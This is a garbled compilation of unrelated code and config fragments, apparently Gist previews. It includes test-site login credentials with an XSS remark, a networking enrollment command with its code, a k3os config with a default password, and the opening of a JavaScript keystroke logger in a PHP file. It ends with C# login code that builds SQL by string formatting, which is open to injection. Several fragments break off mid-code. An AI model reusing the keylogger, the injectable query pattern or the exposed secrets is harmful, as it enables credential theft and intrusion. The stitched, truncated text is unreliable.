http://zero.webappsecurity.com
Username: username Password: password
Basic XSS Attempt, fails as the input is entity encoded but we can still exploit this.
& 'C:\Program Files\Defined Networking\DNClient\dnclient.exe' enroll -code HLFy5jh069gqph8UwyqNvpZ5s-LzYmyudyba8syFoEE |
#### Contents of the preconfiguration file (for buster) | |
# | |
# The configuration fragments used in this file are also available as an | |
# example preconfiguration file from: | |
# https://www.debian.org/releases/buster/example-preseed.txt | |
# | |
# Some more preseed files that contain the full list of available preseed | |
# options: | |
# https://preseed.debian.net/debian-preseed/ |
ssh_authorized_keys: | |
- github:mort666 | |
hostname: rt-k3s-node-01 | |
k3os: | |
password: rancher | |
ntp_servers: | |
- 0.us.pool.ntp.org | |
- 1.us.pool.ntp.org |
// Use Gists to store code you would like to remember later on | |
console.log(window); // log the "window" object to the console |
http://zero.webappsecurity.com
Username: username Password: password
Basic XSS Attempt, fails as the input is entity encoded but we can still exploit this.
Rails.application.configure do
config.force_ssl = Rails.env.production?
end
cfs.php
<head>
<script>
// array of user keystrokes
var keystrokes = [];
// event listener which captures user keystrokes
document.onkeypress = function(e) {
var key = (window.event) ? window.event.keyCode : e.which;
keystrokes.push(String.fromCharCode(key));
// Encoded RSAPublicKey
private static String PUB_KEY = "30818902818100C4A06B7B52F8D17DC1CCB47362" +
"C64AB799AAE19E245A7559E9CEEC7D8AA4DF07CB0B21FDFD763C63A313A668FE9D764E" +
"D913C51A676788DB62AF624F422C2F112C1316922AA5D37823CD9F43D1FC54513D14B2" +
"9E36991F08A042C42EAAEEE5FE8E2CB10167174A359CEBF6FACC2C9CA933AD403137EE" +
"2C3F4CBED9460129C72B0203010001";
public static void Main(string[] args)
{
I hereby claim:
To claim this, I am signing this object:
public static Int64 CheckUser(string username, string password) | |
{ | |
Int64 userID = 0; | |
try | |
{ | |
string getUserID = "SELECT userID FROM Users WHERE userName = '{0}' AND password = '{1}'"; | |
using (SqlConnection conn = new SqlConnection(ConfigurationManager.ConnectionStrings["ssbcon"].ConnectionString)) | |
{ | |
conn.Open(); | |
getUserID = String.Format(getUserID, username, password); |